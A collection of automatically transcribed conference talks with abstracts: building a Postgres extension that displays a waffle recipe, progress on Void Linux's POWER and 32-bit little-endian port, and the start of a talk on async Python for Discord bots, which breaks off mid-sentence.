equal application backslash, plus Chaser. And I found out that I had to use said to escape my backslashes, because there was some backslash and so new line interpreted by post-waist inside the JSON. I really needed these new lines not to be interpreted by post-waist. So I added a set command, which is, again, a little complex because I had to escape the backslash from the backslash that said can interpret. But I assure you it works. And then I, as I said, I just need to update my process recipient to just isolate the JSON data inside my recipe column. And then I use the keywords here to update the keywords with an array containing Belgium and warfare's. So now I have my JSON and it's passed. And I have my ingredients as an array of text. I have my steps as a JSON array of Chasens, and all the other are simpler. Now I need a data model. How do we create a data model? So I won't explain how to create a data model because that's something you should have learned at school. If you haven't, you will find wonderful books to explain to you how to do that. What I did here is I used three tables, ingredients, recipe and step with relations, because a recipe has instructions called step and a recipe needs ingredients. And the between the relation between recipe and ingredients, you will have some qualifiers like quantity, unit and yield. I like to point you to Mokodo, which is a tool I love because it will out of a text description, it will display a rough of your data model. That's very, very useful. And you're welcome to use it's open source. So after that it was very easy to create my tables for performance resin. Again, I know that I will have only one recipe in my tables, but who knows what my extension will become. I used a integer primary keys for performance resin to prevent anyone to add manually data inside this ID column. I use the generated always as identity. To be sure that I won't be able to add several times the same ingredient by adding the same name with different ideas. I added a unique and a not enough constraint on the name of the ingredients. I did the exact same trick for the table recipe so there's nothing new here. And you see here that I have a false table, because we had a zero and relation between recipe and ingredients so that we need a table between them. So that very simple, you will have the recipe ID, the ingredient ID, and then the kind of the qualifiers we had seen. And now it's time to insert everything into my tables. If you're wondering how to do that. And you're asking yourself, and you're asking yourself how you will be able to retrieve the ID from the recipe to data inside the steps or things like that. I just know that I did that in only one query. Long way 110 lines of SQL and I use a lot of with this elements. I also use the returning clothes for an update or an insert to be able to get the ID of the recipe of the ingredients so that I can populate all my tables at once. If you're very curious about it, I will give you access to the source code of my extension and the end of this presentation. Please go there if you'd like to make it better, you're very welcome. So, I'm back at my desk just to explain to you how I manage to insert data inside four tables in one single SQL query. So, my code won't have a lot of comments because as I want people to make it fit on a slide, but it's not that complicated. So, first, I used a lot of with this element and the first one is the one where I will insert data inside the recipe table. So, I decided that should the conflict happen here. I will do an update so that I can get the recipe of the ID, the ID of the recipe. My ID was should a recipe have been have been already inserted. Maybe we want to update the recipe at more steps or more ingredients and things like that. So, I need to use on conflict do update to get the ID, whatever happens. Nothing more I can say about this query. It's pretty standard. I use my process recipe temporary table to insert data inside the recipe table. Then I have another with this element where I will refine the ingredients ingredients are stored in an array of Chesson. So, first, I will use a Chesson be a rare elements text that will give me a text text that I can process. And I found out that in my recipes in for the ingredients I had power save it with some details inside and I decided that I wanted to get rid of those details, because I had no idea how it would fit into my data mobile. Maybe later I will make the data model accept these details but for now on, I think that it's not useful. So, I will use regax replace just to replace this kind of thing so everything between two pound cities. I will replace that with a simple space. Then, and I found out that Americans use fractions to say one and a half kept, for example, they will use a fraction half. So, I had to change that to have real decimal numbers. So, I used a huge case when expression here to replace any fraction I could find into decimal numbers. And that will give me give me a processed ingredients with this element. So, because that I have processed my ingredients, I will be able to use them to retrieve the name of the ingredient. So here, you see the parts that needs to be fixed that we remove data from the array. I have created before with the Jason array takes something functions. And so I will use the table, I will remove the first value and then I will remove the second value. That's why eggs are them. That's why the code saying that eggs is not an ingredient, but a unit. I use the same trick with and conflict just so that anyhow I will have the ID and the name of the ingredient that was inserted into the ingredient table. I will use another with list element where I will insert data into the ingredient in the recipe table for this table, I will need the ingredient is a recipe ID the quantity you need and you need you can be found on the recipe ID on the recipe table. And so, I found things easily. I still had my processed ingredients with this element where I have an array. And so I have here the quantity that I would change to decimal. And then I have the unit here. That's the second value in my array. And here is can be found on the processed recipe field. So nothing really is a problem. I had to use this very long function here, just to find out the name of the ingredient I was inserting into. And so I will be able to insert data inside the step. So the last table is a step table. Again, nothing very difficult. I have all that I need. I have the recipe ID and I will use here a function to be to record set that will give you with rose. I will use rose with ordinality because I need the ordinality I need my steps to be in order so that you can do the recipe actually. So I use this trick rose with ordinality and you can go into PostgreSQL documentation to find out more about it. And then I use just and be to record set to get a set of calls from my chess and be. And that's all. As I say, it's long, but it's not that complex. It's long because we have to insert into four tables. So of course we have at least four queries inside one, but I needed to process my ingredients that were not the format I was wanting willing to have. So I had to change how the ingredients were formatted and as you see, that's where I eventually found the bug. So that's where I will need to work a little more to make it better. Then we can display the recipe. First, we use a simple with this element to get the first recipe. In my case, I have only one store, but who knows what my extension will become so in case someday we have 1000 offers recipe, I will only get one. And then on top of that I just joined to get anything I need from the ingredients. And that's where I found out that I had a bag because the name of the ingredients, it's was a space. I had found that there was sometimes you need and sometimes there is no unit so I need to fix that but sooner or later I try to work on it before for them and not sure I'll be able to achieve that. And then you can display the recipe using the exact same list elements, but joining it on the step table. And you will find that you have only four steps to create offers. That's very simple. If you put all that together, you will have an extension to create your extension you will need a fine name after your extension, then hyphen hyphen and the version number. I decided to go with a very simple version versioning that one, two, three, four. That's nothing more simple than that. On top of your SQL file, if you want to prevent anybody to play that SQL file on the PSU session, you can add this header. The header will quit if it's you if it's played against PSU without using create extension. And it's time to create your repository. So I use the git repository because it's very useful. Of course, it's not mandatory. But what's mandatory is to have a Mac file, you make file should have your extension name, and it should list your files, as I did here. And then this Mac file will need a control file. So control five will have things like default version, the body, past name, and so on. You, you have here in my extension, I have only three variables to set to have a control file. So that you should be able to use Mac install to install your extension. And then the extension is installed of your server. It doesn't mean you can use it right away because it's not installed on your databases. It just installed on your Postgres server. How can I install my extension on the database so I created a database called leticia my name. And then I created a used create extension PgWafers to create my extension. If I look at the schemas, I see that my PgWafers schema has been created. If I look at my tables, I have my four tables ingredient ingredient in recipe, recipe and step. And if I look at my functions, I have my two functions display ingredients and display recipe. These two functions are using the exact same as field code I gave you at the end of the previous part, just to display the ingredients and display the recipe. So now it's time to display the ingredients. How do you call a function in Postgres? You can do select PgWafers.DisplayIngradients or select style from PgWafers.DisplayIngradients. And of course you find the same bug with eggs, that's totally normal. I did not have time to fix it between two slides. You can use the function display recipe to display your recipe steps. So we did what we wanted. We are able to use Postgres to explain how to bake wafers. That's very great. So now we want the world to know. And just to disclaimer here, don't install PgWafers on your projection servers. I'm not very sure that that's a good idea to do that. It's actually not useful in production. Please don't do that. So to register on PgXn, it's very simple. First, you need to create an account. The second will need to be validated by your human. So it won't happen in the next two minutes, but this guy are very, very fast. You won't wait more than one hour. After that, you will need to create a meta.chason file that will explain how your extension is created, the file it uses, where you can find the source code and things like that. You will find a wonderful how to on PgXn website. After that, you will be able to upload your extension. You should find that your extension is successfully uploaded and has its own web page on PgXn, like I did for Postgres wafers. So now, I think it's time to taste my wafers. I hope it's a success. It seems like a success actually. If you see, that's what I call a success. The source code are available under my GitLab account, and I like to thank Rick Morris for the idea of baking wafers with Postgres. I'm available if you have any question regarding extensions with Postgres regarding Postgres in general. Thank you for watching until the end. Have a nice day.
FOSDEM would not be FOSDEM without waffles... What if we coud use Postgres to make waffles ? During this talk we will use the excuse of FOSDEM and Brussels to create an extension that will look for the best waffle recipe and use Postgres to display it. During this journey, on top of making delicious waffles, we will : - understand what an extension is - find the steps needed to create an extension - make this work all together - install our extension - display the best Waffle recipe.
10.5446/53293 (DOI)
you Hello everyone and welcome to my presentation on Void Linux. I'll be talking about the progress of Void Linux on the power architecture in the last year and a half or so. But first who am I? I'm a programmer from the Czech Republic and I've been involved in open source since 2007 or so. I have contributed to a fair amount of projects over time. One big one is the Enlightenment Foundation libraries which is the set of libraries intended for the Enlightenment desktop environment. I've also messed around with game development, programming, language compilers and so on. But these days I'm the primary maintainer for power architecture, port in Void and a few other things in Void. So what is Void? Of course I gave a talk previously at the OpenPower Summit 2019 in Lyon, France. But there are probably many of you who haven't seen the talk so I'll describe it in short. It's an independent Linux distribution with custom package manager. It was originally created as a test bet for this package manager. It has a focus on simplicity but it's not like these minimalist distributions. It's more like tries to strike a balance between the two things. We have a fair amount of packages and we have a similar functionality to other big distributions. In order to stay simple, it's rolling release so we don't have to deal with release management. We mostly ship stable software though. It doesn't really ship lots of bleeding edge stuff. We make sure that everything stays stable. It's binary based but there's a system called XPSSRC which is similar to BSD ports like system which you can use to build your software packages from source. So basically every package which is present in the repo is buildable from source using XPSSRC. It's sort of one or three kind of thing with all the package recipes. Of course besides power which is supported at this point. It's on x86 where it started. It's on ARM and I-64 of course and we also have build profiles for MIPS but we do not ship any packages for MIPS. The intention is so there is a low barrier of entry, very open and inclusive and informal community. So if you want to contribute, it's easy for you to get started. So how is voice on power different from other distributions? Well for one we have a particular focus on desktops and workstations, not servers. Most distros are focused on servers. We feel like there's enough of that stuff and voice on power was originally created to provide the desktop operating system for me. So sort of selfish reason. We support both little and big end-in. With little end-in having the standard requirements for power rate or newer CPUs, big end-in runs on all the old Mac hardware and so on. What's different from other big end-in distributions? We use the modern ABI on G-Lip-C as well which is something other distros don't know. It's sort of an obvious decision for us because it was a fresh port and we didn't want to deal with 30 years old ABI so we just went with the modern one immediately. Of course there's also the page size in the kernel. We use 4k pages by default. Most distributions use 64k pages by default. 4k pages is what's also used by x86 and most other architectures so it's more compatible with different software and hardware. We also have wider desktop software support. This includes things like the Chromium browser and electron applications and so on. Now let's go over the quick history of Void because while I describe this in detail at OpenPower Summit, many of you are probably not in sync with this. I started the project in late 2018. This was because I bought Talos 2 Lite to use as my primary workstation. I wanted a desktop operating system for this and I used Ubuntu for a bit and I was not very happy with it. So I just did initial port and it was done in like three days and I had a graphical environment ready. Over the coming months I kept expanding the package coverage and eventually during 2019 we got to complete coverage on Lysolundian. There was also big-end-in ports from the start for 64-bit muscle Lysolundian and for 32-bit G-Lypsy and muscle Lysolundian. There was not a 64-bit G-Lypsy big-end-in port because of the ABI situation we weren't aware at this point that it actually just works. So this port came later in April. During late 2019 there was complete coverage on all repos and I gave my OpenPower Summit EU talk and in November I got a comment bit in upstream repos. So from that point all changes go directly into Void without actually lingering in my custom repo for too long. But this talk is not about this, it's about what happens since that point. So this screenshot it's visuals to the code, an application which lots of people have been requesting running on Void with PPC64 early and muscle. As you can see in the corner it's all printed there and it works fine. But first Java Bootstrap. That's one big thing we actually did and it was kind of a pain. We have OpenJDK8 and 11 in repos and since you need OpenJDK to build OpenJDK and you need a version which is one version older we had to eventually reintroduce GCC6 which shipped GCJ which is GNU Java compiler now deprecated but in GCC6 it was still present. We used this to Bootstrap OpenJDK7 which is a Bootstrap only package it's not meant to be used by people. JDK7 is then used to Bootstrap8 and then we have Bootstrap packages for 9 and 10 so we can eventually Bootstrap 11. This is a fairly fast process on PPC64 and early because there's a JIT in there and it takes maybe 10 minutes or so to Bootstrap one OpenJDK. On 32-bit PPC this is very slow because there's no JIT support there's only the interpreter and it instead of 10 minutes it takes like four hours so that's kind of pain but oh well. Go. Go is the language which is fairly widely used for specific kinds of software and we have a bit of a problem there because Google who maintain the tool chain have only support for PPC64 LE. Well technically speaking they do have BE also but their BE part uses incorrect ABI or well do ABI we do not use and it also needs power rate which would be a problem by itself because we make sure that all software in the repo runs on all hardware we actually support. There's a GCC Go but GCC Go is unreliable. For some reason it hangs while we do know the reason it there's some bug in variable tracking code which results in GCC Go entering infinite loop when you try to actually compile Go with it. So we can add this to Bootstrap we use official binaries to Bootstrap these official binaries are provided for every architecture they are not provided for muscle lip see but for muscle lip see we deal with it by using G-compact. Since the Go compiler is written in itself it doesn't actually use a lot of lip see at all so G-compact actually can run it reliably and we can bootstrap with the official binaries pretty to a base support of course is missing completely we don't have it. Askel. Askel was also fun under some definitions of fun we use a self-built binary snapshots to bootstrap the compiler this includes muscle up to this point because recently I figured out how to cross compile a partial back binary distribution of GCC this can be unused to compile the actual distribution on a native environment. Bigendin is missing for now because of some bugs in the compiler we will try to introduce it for 8.10 for now the patches for future Bigendin introduction are actually ready. Other languages we since recently had greater support for common lisp as PCL is finally in the repos but for now only on little and in only to test the Bigendin much better. It's bootstrapped with ECL which is a portable common lisp compiler which works on every platform. We are also preparing an update to C-Lisp which hasn't seen a release since 2010 but there's an active version control so we'll make a snapshot from there. There's also things like D and Zigg and some others which are currently still missing they don't have anything depending on them so we haven't paid much attention to these yet. Libre.SSL performance. Void uses Libre.SSL instead of Open.SSL at this point. Libre.SSL is the fork of Open.SSL 1.0 made by OpenBSD project. It was with the intention to have greater security. The problem is it only has assembly files on x86 and some 32-bit ARM. These results in performance which is much inferior to Open.SSL and of course it also results in lack of hardware crypto support on PPC64 early and on R64. So I made a stopgap solution by importing those assembly bits from Open.SSL upstream and this is now present on my GitHub and it's shipping in Void. It has up to 20 times performance increase in things where hardware crypto can be used. This is especially visible for example in Open.SSL if you use SSHFS you can use this to increase your throughput from 18 max per second or so to like 500 max per second so that's a big difference. Chromium upstream does not support PPC64 early but there's downstream patches available since Chromium 84 we've been shipping these downstream patches. It works quite well. It's currently the only browser engine which has JIT support in the distro and in any distro and it works on muscle as well. It's a fairly large patch and Google has been rejecting it to most of it for a while now so there's a chance we'll have to ship it downstream forever but that's life I guess. Related to this we now have support for Electron which is a framework for applications so you can write applications in HTML5 and so on. It uses Chromium, it's basically a version of Chromium. I don't use it but people have been requesting different applications like Visual Studio Code and Element. These do work. They work because we have a system-wide Electron. There are some funny build system workarounds for these applications because Electron build system from Node.js tries to download the binary snapshot of Electron and it doesn't know about the architecture so it fails and what we do is just enforce the x8664 architecture, make it present, it's x86, it will download its binary snapshot which obviously doesn't work but in the end it will be using the system-wide one anyway and it's pure JS anyway so it doesn't make any difference. It's obviously only on LE just like Chromium itself. I tried patching things for a big ending before and it doubled the patch and it never worked quite right so I eventually gave up. It was too much of a pain to do downstream muscle. That's work. We had muscle support previously so I just had to add a small patch adding the PowerPC muscle specific things. MD GPUs. There's this problem called MD GPU DC or display core. It's in the kernel and it has a very haphazard usage of hardware floating point which results in for one it's not portable. At some point Raptor computing systems added some code to make it work with these new Navi cards but this was never back ported to older kernels so we back ported ourselves down to 5.4. Since 5.10 there's apparently a dependency on page size which is kind of bad but it still works for us because we have 4k pages. Other distros have issues with this apparently or at least that's what I've been told. They have 64k pages and AMD doesn't work with this. There was also a big rework of cross tool chains recently. There was this issue that we had many different cross tool chains. The list of targets grew a lot recently. We've needed to deal with this because the cross tool chain build recipes were duplicating lots of code so I introduced a common what we call build style for cross tool chains. Most of the code is in the build style and now each cross tool chain is only 50 or so lines defining the actual tool chain specific things. As some extra goodies which I introduced during cleaning it up. We now have a G-Lipseed cross tool chains on muscle hosts which was not possible before so we have much expanded support for this now. The configure arguments and so on are unified for all of the staff now so that's better also and of course no more dirty master there's previously the master there is a sort of a built container used by Xvpssrc. Previously the intermediate built artifacts because you need to build initial GCC without lipseed first. You need to build lipseed and you need to build the final GCC. The intermediate built artifacts were messing up the container. We now deal with this by just restricting everything to temporary directories. In first status this is a screenshot from our build server. It's currently still a Talos 2 Lite with 18 cores and 128 gigs of RAM and it runs in my bedroom it's actually next to me right now. This is not ideal of course but I don't have a better place to put it. Big and in built run in a VM thanks to KVM you can run cross-end in VMs and there's no performance decrease. The little ending builds run on bare metal and the primary actual package mirror where people actually download stuff it's on a separate server in Chicago in the USA. The mirror has 10g network and two terabytes of storage so we cannot really compete with this. I do have a public IP here but I don't think anybody would want to download stuff from me. There's several other mirrors provided by the community. We could certainly use faster build hardware and we could certainly use hardware which is not in my bedroom. The primary mirror after we have some better built machine which is actually co-located in a real server place we should migrate the primary mirror to that machine so it can be available immediately after built so we don't have to upload batches to actual server on the other side of the world. We also need to do more built automation this is work in progress I'm working on some software to actually improve the infrastructure. Now the main thing 32 bits a little end in. This is a screenshot from from a root userant which is 32 bit little end in you can see it's running. So first why why not? It officially does not exist but only officially. The thing is so you can run 32 bit binaries on a 64 bit power because 64 bit is just an extension of the original power PC and you can certainly run natively 32 bit binaries on 64 bit CPUs. This is on big end in though. On little end in this is actually the same because because that makes sense. In practice this therefore just works. The bring up process was fairly basic made easy by XPSSRC it was similar to the other architectures we have. But there is no native support for 32 bit little end in Linux kernel itself so we cannot actually boot this on real hardware. It does work as a root on 64 bit kernel for the compatibility stuff but not out of box so there are some fixes needed for the kernel. So first we have to have to fix 32 bit compatibility in the kernel. The first issue was that signal handlers were clearing the little end in bit in the machine state register. This was fixed for a 3-bill patch. Also 32 bit VDSO were disabled by default. This is just a build system change. Some VDSO's are broken on little end in. We had to disable these coincidentally we found that the power PC 601 had these same VDSO's broken. We are not a worry of any relationship between this but we just had to extend to the disablement. System calls with 64 bit arguments were also an issue because the high 32 bits and the low 32 bits were passed in the wrong order. There's some wrappers which do the passing so we had to fix the wrappers. All of these are very trivial patches and things do run without them but they also crash at some random points usually like at the obvious ones like when entering a signal handler or when exiting. After patching there's no more known issues at least we are not aware of any known issues. Fixes for this are being upstreamed into the kernel except the VDSO fixes which will be fixed by just moving the VDSO codes to see. This is a work in progress by other people in in current mainline so at one point it will just get fixed. There will be or there are backports to all void kernels which do run on little and then that is 4.19 and higher. Now for bootstrapping for the 2-bit little and then well first we had to create built-in cross profiles for Xbpssrc. These profiles define the target triplet and some other specifics of the compiler. Then we had to create cross tool chains for 32-bit elite targets. That was fairly easy we just had to copy the beginning and once and adjust the triplet and so on. Some minor patching was needed in G-Lip C and in Muscle. In G-Lip C just some warning fixes. In Muscle we had to adjust the dynamic linker name so it matches GCC properly. Adjustments around Xbpssrc were needed obviously just to look where architecture specific code is and usually just trivial adjustments needed. After this we could compile or cross compile a base change route. This is basically a minimal set of packages needed to assemble the container in which everything is built. Any errors had to be fixed along the way and there were relatively few and very trivial ones. After that we had to a basic set of packages which we could use to binary bootstrap a built container. Then we could rebuild every package of the build container natively without cross compilation. Then we could build other base math packages like base void strap and so on which add more software to the route and after that more software in general can be built like all sorts of different stuff in the repo. Of course when errors come up fix these. Usually there's not a lot of them. We did run into some issues with like a VSX code and say image decoder assuming that little ending means power 8. For now we compile for power 8 so this is not a problem for now but eventually these things will have to be patched. At this point I could probably function on a 32-bit user run if I compiled enough of the user runs. But there are some buts. There's no official support on G-LipTee that means the dynamic linker name is shared with big end-in. The simple versions are also shared with big end-in. This is not good for having an official port because every every architecture has to have a unique dynamic linker and fresh single versions also. So I'm going to propose an official port later and once it's actually upstream I will rebuild the whole experimental repo from scratch. The ABI is the same as big end-in and this is fine probably. The ABI is well defined for both end-ins and it must pretty much just works as it is. Even the dynamic linker name is stable and since muscle doesn't do a simple versioning there's nothing to worry about. Of course we did because of the we could but another big thing was the easier emulation of 32-bit x86 binaries. There's a project called Box86 I'll get to it later which we will be previewing. Of course eventually it could be possible to actually port Linux to G3s and G4s since the CPUs do support little end-in mode it would just need to actually work. Or we could take the easier path which I was made aware of and just use Be Linux kernel and then use the switch end-in call and the swizzle this is called data for user run. Apparently this should work I'm not sure how it would work yet but I was told it would work. For now it's strictly Power 8 Plus though so we only run as compatibility on our Power 9 workstations and so on. There are some obstacles for one LLVM support which is needed for MESA and some other things. Fortunately this was recently upstreamed by the free BSD folks who needed it for the loader. We back ported the patches to Voigt. It just came in handy because I was just about to start working on porting LLVM when I found that there are patches available already so this saved a lot of work for me. We also needed for Rust support which is currently blocking a fair amount of user run mainly because of things like clip-rs SVG which is depended on by GTK and lots of other things. There are some work in progress patches available which I wrote for Rust but it doesn't work at cargo crashes and so on. We need to figure all of this out. Proper G-Lift supports needs to be made and we could also use the opportunity to improve the ABI perhaps but we are not yet sure about this. One thing we definitely do want to do is use 64-bit long double type. This will allow us to ditch the weird IBM 128-bit floating point type which is basically composed of two standard 64-bit ones. G-Lip-C is moving on from this to real 128-bit floating point 464-bit but we cannot use this on 32-bit because we do not depend on VSX being present and these new floats require vector registers to pass them around. We all need to choose a unique dynamic linker name and fresh symbol versions for the new port. I'm kind of thinking we could use this to fix up our 32-bit big-end imports as well. I mean we could at least ditch IBM long double as well but I'm not yet sure on what the best technical approach to this would be to ideally preserve compatibility with all your stuff and ideally also make it upstream mobile. As for results there are testing repos now available and it can fully compile itself. A portion of the repo is packaged by portion I mean some 8% or so. This might not seem like much but lots of core things are already available and to lots of most other things could already built. We had just haven't built them yet. There's core user ones, there's development tools like the compilers, LVM, there's Mesa, there's SDL and of course there's initial port of Box86. What is Box86? Well Box86 is Linux X86 and later developed for ARM devices. It has nothing to do with PowerPC but we wanted to use this to emulate some old games which only had binary versions on our power machines. The problem is this needs a 32-bit little end-in host and you can probably see what I'm getting at. This is why we needed a 32-bit little end-in port. So there's now an initial PowerPC port done by our community. It can run GLX gears and I also got it to run Unreal Tournament. The old one from 1999 it works but it's fairly slow. Sometimes it's playable, sometimes it's not playable. There's no dynamic recompiler for PowerPC yet in Box86 so it's purely interpreted. Of course this is still faster than the likes of QMU because unlike QMU it actually runs lots of code natively. How Box86 works is that it wraps native system libraries for different functionality things like SDL and image libraries and audio libraries and OpenGL and so on which means basically most things which are provided by the system do not run emulated. They use the native versions and all the emulated code is the actual game only. Now for the future. This is the screenshot from our statistics page. You can see there's the coverage for at least very high for be it slightly lower and for 32-bit little end-in it's fairly small for now. One thing is infrastructure. I would like to get things made official at one point. Mainly the PPC64LE port should get an official airport one point. It should be easy because that port is stable and there's nothing much to change in it. As for BE this has some issues. BE because of the API situation which we need to clarify with upstream first. 32-bit has some issues also. There's also the issue that some server software on official Void repos is written and goes so it's not portable to these. This can be worked around differently but yeah. The LV2 BE-ABI we will need official support in G-Lipsey for this and right now things mostly work by accident. That means the dynamic linker name and symbol versions are shared with the 64-bit LE port. An upstream did say they wouldn't be against this but we would need to formalize the API first. IBM thinks VSX requirement is a part of the API. We do not entirely agree but we are still going to solve this so we are going to formalize LV2 legacy compatible API. This legacy compatible API will be just an extension of the current API. It will remove the requirements for VSX and VMX and it will also switch to 64-bit long doubles to the HD 128-bit IBM floating point. It will come during this year. It will be shared by G-Lipsey. It will be shared by Muscle and FreeBSD. Muscle and FreeBSD already implemented in the way I intended to specify so basically there's existing compliant implementations before the spec specification exists which is kind of funny but oh well. There will be other things. We will have to upstream as many patches as possible. We will want to write a new installer for our live media and also work on an enablement of new software and as well as working with upstream of different software projects which do not have power supported to add support for power. Also work has been done in our year and a half and there's still plenty more to be done. If you want to talk with us or work with us you can join our IRC channel on a free note and if you want to see some detailed statistics and so on you can visit our website. For now that's the end of it and I'll well I will show you some cool things but thanks for listening and there will be a live Q&A session after this. Okay so well added. I will show you some cool stuff I guess since we still have some time. Here I have a route of 32-bit little end-in Void Linux port. It's fairly minimal and doesn't have a lot of software in it but it does have Box86 in it. Obviously as you can see it has a build of Cmake and it has a build of dependencies for Box86 so we can try compiling it and since this is slow we can try compiling it faster. And it's linking I believe. Well maybe not yet. This will take a bit. Well for now we have some other stuff. We have a build of GLX peers which we are now going to run with this. It spawned on a different screen so let's move it just over here. As you can see it's running at native refresh rate of the screen and admin 60 FPS but it can do the 60 FPS. Obviously it's mostly open GL application and very simple so even emulated it will run at decent frame rate. But I have a cooler frame and that's Unreal Tournament. This will take a bit to start up because there's a screen recording and so on running so yeah. And here it is. You can see this is choppy. It's usually faster but yeah there's other stuff loading the CPU right now. You can see at some points it's also fairly smooth. It depends on how far into into the screen you can see. Anyways here's the menu. We can start a practice session. I believe this is also an unoptimized build of box86. So this will also run faster if we try to... You see now it's like smooth if there's no distance visibility but once you can actually see far it just blows up. But yeah it does work and I think that's pretty good enough for now. So I think that's the end and there will be a live Q&A session after this so feel free to stop by and ask some questions. Okay we're going to go live in a few seconds. Hi Daniel. So you're going to answer some of the questions or should I read them out? So... There were some questions about how the builds were done. I don't know if you could elaborate on that level. I think you're still muted. Hold on now you should be able to hear me. Yes now it's better. Okay good. So let's start with further questions I guess. Yes. So what exactly were you asking regarding the builds? So there were some questions about you. You mentioned that you have a scratchpad SSD going through VIRT.io. Oh yeah like this. Yeah basically we were... The first thing we did was just set up a big end-in VM and to use a QCao2 disk to like store the operating system and then in order to like share the repo directory with the VM so it can actually write packages into repo we just exposed it over VIRT.io.9p. Of course this has problems because the throughput of the QCao2 storage is not as great as just a native SSD and it was actually slowing down the builds. So we got around to this by just buying a new SSD separately and just splitting into half and exposing a one-half or one partition as a block device directly to the VM and that way it can basically run as fast as native. It does run as fast as native so far it works very well. Okay then there were some questions around Embro-la which is broken. I don't know if you could comment on that. I don't see that here actually. Okay so Embro-la is broken on little end-in and apparently it worked on the big end-in. Okay that's interesting we've never run into this so I haven't really looked into it so I don't think I can answer this but if you can point it to me in chat so I can take a look afterwards. Yeah I haven't actually also had that error or that issue on on our builds so that's why I was just asking maybe you had that experience but we will see if T-platin can can actually comment in chat more on that. Okay I see some questions in the chat so I'll reply to these directly. I see with Box86 I could be able to run Unreal Engine for x86 on power. No because it's mostly suited for old games. If you run a new stuff on this it will run very slow. I tried to run the well-known Linux game Xanatic on Box86 just as an experiment to see like how slow it would be and it's not a particularly demanding game it works on my testing G5 but in the Box86 emulator it runs at like well every five seconds it updates the frame. The menu runs fairly fast but once you get in game it slows to crawl. I see a second question what package manager is void most similar to? Well it's kind of its own thing really like it uses several binaries xbps install xbps remove xbps query and so on and then it uses like regular positional regular optional arguments to pass to that so like to upgrade your system you run xbps-install then you pass capital S and lowercase u once is to sync the repo indexes once is to upgrade if you want to install a package you just run xbps install your package name so it's not particular similar to anything else it's like a hybrid between most things. As for Qt5 packages cross-compile to h64 well Qt5 packages can be cross-compiled for h64 I don't think there's any issues with this because we do cross-compile and for h64 and void I mean our ARM ports are fully cross-compiled and Qt5 is definitely present there what's problematic is Qt5 web engine which can be cross-compiled but the problem is it needs to match the word size of the host and target so if you want to cross-compile for 64 bit target you need to cross-compile from a 64 bit host if you want to cross-compile for 32 bit you also need a 32 bit host this is a bit of a problem for us because we cannot cross-compile Qt5 web engine for 32 bit ARM because we cross-compile from 64 bit host we could deal with this by using a 32 bit build container but this is not it and what's the performance of a 32 bit kernel user run to running on power 8 or power 9 versus 64 bit one well I haven't really done any in-depth for benchmarking but it seems to be fairly close I haven't noticed any actual difference in things like compilation times things mostly compile about as fast on a 32 bit CZ run and on you
Void's POWER architecture port has been progressing steadily since the last OpenPOWER Summit EU talk in 2019. Recently we introduced a completely new 32-bit little endian port, which will be a big part of this talk's focus, and is a first among Linux distributions. I will not stay there though - we have more to cover, including stuff like Chromium and Electron applications in repos, faster POWER crypto in LibreSSL, reworked crosstoolchains, stable support for newest AMD GPUs, and our big endian variants are also receiving attention, including properly clearing up the 64-bit ABI situation. Void Linux is an independent, rolling release, general purpose Linux distribution (leaning towards desktop/workstation focus) originally created in 2008 on the x86_64 architecture as a testbed for its own XBPS package manager. Over time, it has received a variety of ports, including 32-bit and 64-bit ARM, MIPS, and eventually POWER and PowerPC. It has variants for 64 and 32 bits, little and big endian, and glibc and musl C standard libraries. Most recently it has received an experimental 32-bit little endian port, which is a first among Linux distributions. I will be focusing partially on the new port, and partially on other news in the distribution since my last talk I gave at OpenPOWER Summit EU 2019. I will explain our goals with the new port, as well as our plans. Additionally, the future of the distribution will also be covered, as well as currently remaining issues and blockers that prevent us from achieving that.
10.5446/53295 (DOI)
Hey, hello, I'm Chek and welcome to my talk, don't be afraid of async. This is about my journey when I started to use async and actually how I learned that async is actually very helpful in some application and why you should use it. Also, I came across some of the questions that I have about async. Once you like step into this async kind of style, some of the rules that you learned in your programming experience in the sync world may not apply or there's some kind of traps there that maybe you have to overcome. So I came across that with you all together. So here are my contact information here. You can see that you can contact me on Twitter if you want to discuss further. Also, the slides is available at the link there. So it's basically under my account on Slice.com. You can check that out. Okay, so I would give you a brief introduction of myself. I'm Chek. I love open source. I've involved in a field open source project in the past and right now I'm very lucky to be working for Terminus DB, which is an open source graph database. So if you're interested in graph database and well, it's open source. So please feel free to discuss with me. Also, I love organizing Python events because it gives me joy, it gives me opportunity to learn and met awesome people. So I've been organizing some sprints before the pandemic happened and also I'm organizing your Python this year. It's going to be online again. Python Global, I help organizing. The first Python Global last year is tons of fun and we may have it this year, but it's not sure yet. So please stay tuned. Also, there's a pyjamas con, which is a online 24 hours wearing your pyjamas, having fun conference that is happening at the end of the year. So also I streamed on Twitch. So I'm just starting back into my streaming schedule for this year. Usually I would have some kind of exploration or tutorial section on Sunday and some other things during the week. So please follow me and make sure that you get notification when I go online. So first of all, what is Discord? So I'm sure that some of you are already using it because of the conference and what's called is a very good tool to be able to chat with people online, especially during this time that in person contact should be avoided because of the virus. So yeah, so it's very good. It's kind of like Slack plus Zoom. So you could actually chat with people. It's kind of like a chat room kind of thing. But at the same time, you can have voice call with people, which is kind of like Zoom. We use that work actually. We loved it. Also, well, it's like this setup here. There are lots of conference using Discord. Well, the first conference, not the first conference, but like EuroPython that I organized last year is actually using Discord. So actually, this is how I started to write the Discord board. Okay, so it's amazing tool. The good thing about it that I like is that Discord is very developer friendly, I would say, because a lot of the users are actually technical people. They are mostly, you know, they will be interested in gaming. They are also interested in programming as well. So they provide this API for the users to create boards that could automate a lot of things, that could help them to actually manage the community that they created on Discord. So for example, I see like all different kinds of board with Discord, right? You can actually go to the marketplace and check it out. They do have boards that help you to moderate your community because, well, if you're a community welcome, anybody to join, you may want to have some moderations. Make sure that everybody is nice, you know, because code of contact is something that is important, right? Also, there's other things that you can integrate so people can have more fun using Discord. There are other tools that you can use to help your productivity actually. So when my team started to use Discord, we tried different things, we tried some calendar tool that give us reminder or put our meeting schedule on Discord. We do try, you know, we do have a dice board that we could actually floor dice using the board. That's actually fun when we are doing some kind of ice breaking things. So you can even play games, right? You can even sell games there actually. So that's really cool. So this API actually, you can do a lot of things. Well, you can check out the documentation there. I put the link there. So it's very, you know, like I said, it's kind of designed for developers to use it. So, but, you know, not everybody like Reddit API from the start, right? Because, you know, sometimes if your board is more complicated, of course, you will use a programming language of your choice to create this board. And then you don't want to write out this kind of API interface every time when you create, you know, a new board, right? So here is Discord.py coming into your rescue because it's designed to be used in Python. So you can use Discord API with your Python code very easily and is used as an a-sync, which, like I said before, is kind of like a new to me when I, you know, when I first try to write a board on Discord, then before that I've never used a-sync. I know that, you know, if you're developing web apps, a lot of times you will be using a-sync. For example, you know, Flask application, a 